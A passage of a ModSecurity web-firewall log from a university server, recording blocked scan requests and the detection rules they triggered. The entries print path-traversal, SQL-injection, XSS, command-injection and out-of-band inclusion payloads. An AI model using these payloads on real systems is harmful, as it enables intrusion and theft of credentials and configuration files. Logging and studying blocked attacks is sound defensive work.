"WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAARpg6AAAAAU"]
[Tue Aug 29 11:43:18.412704 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAAbo-hgAAAAi"]
[Tue Aug 29 11:43:18.458701 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAbo-hoAAAAi"]
[Tue Aug 29 11:43:20.456172 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAbo-h4AAAAi"]
[Tue Aug 29 11:43:21.516613 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAdSZTEAAAAX"]
[Tue Aug 29 11:43:21.534717 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAdTBGMAAAAY"]
[Tue Aug 29 11:43:22.419825 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:token: {{token}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO13asCo-f0AAAdftYkAAAAG"]
[Tue Aug 29 11:43:23.541693 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAenGYkAAAAM"]
[Tue Aug 29 11:43:27.674739 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAARpg8EAAAAU"]
[Tue Aug 29 11:43:28.623610 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAfFJ@UAAAAR"]
[Tue Aug 29 11:43:29.531586 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAfEBs0AAAAO"]
[Tue Aug 29 11:43:31.396726 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13c8Co-f0AAARpg8oAAAAU"]
[Tue Aug 29 11:43:31.417133 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAfEBtMAAAAO"]
[Tue Aug 29 11:43:36.375648 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAdSZV4AAAAX"]
[Tue Aug 29 11:43:37.445488 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAdOeUoAAAAS"]
[Tue Aug 29 11:43:40.416028 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAARpg98AAAAU"]
[Tue Aug 29 11:43:40.459427 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAfFKA4AAAAR"]
[Tue Aug 29 11:43:42.517443 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAe3994AAAAA"]
[Tue Aug 29 11:43:44.383777 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/file"] [unique_id "ZO13gMCo-f0AAAeChesAAAAw"]
[Tue Aug 29 11:43:45.372702 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAdOeVUAAAAS"]
[Tue Aug 29 11:43:47.423593 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAdOeVoAAAAS"]
[Tue Aug 29 11:43:48.417579 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAdftcgAAAAG"]
[Tue Aug 29 11:43:48.474013 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAeChgIAAAAw"]
[Tue Aug 29 11:43:49.423238 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAc4EsYAAAAP"]
[Tue Aug 29 11:43:50.384582 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfh.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAeChgkAAAAw"]
[Tue Aug 29 11:43:50.428038 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAe8l48AAAAF"]
[Tue Aug 29 11:43:51.404519 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAenGcYAAAAM"]
[Tue Aug 29 11:43:54.865756 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13isCo-f0AAAfZj0MAAAAN"]
[Tue Aug 29 11:43:55.764042 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAdOeXQAAAAS"]
[Tue Aug 29 11:43:56.418986 2023] [:error] [pid 2022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jMCo-f0AAAfm6NQAAAAk"]
[Tue Aug 29 11:43:57.399621 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAfEBwEAAAAO"]
[Tue Aug 29 11:43:58.398029 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAfky8AAAAAi"]
[Tue Aug 29 11:43:59.404337 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 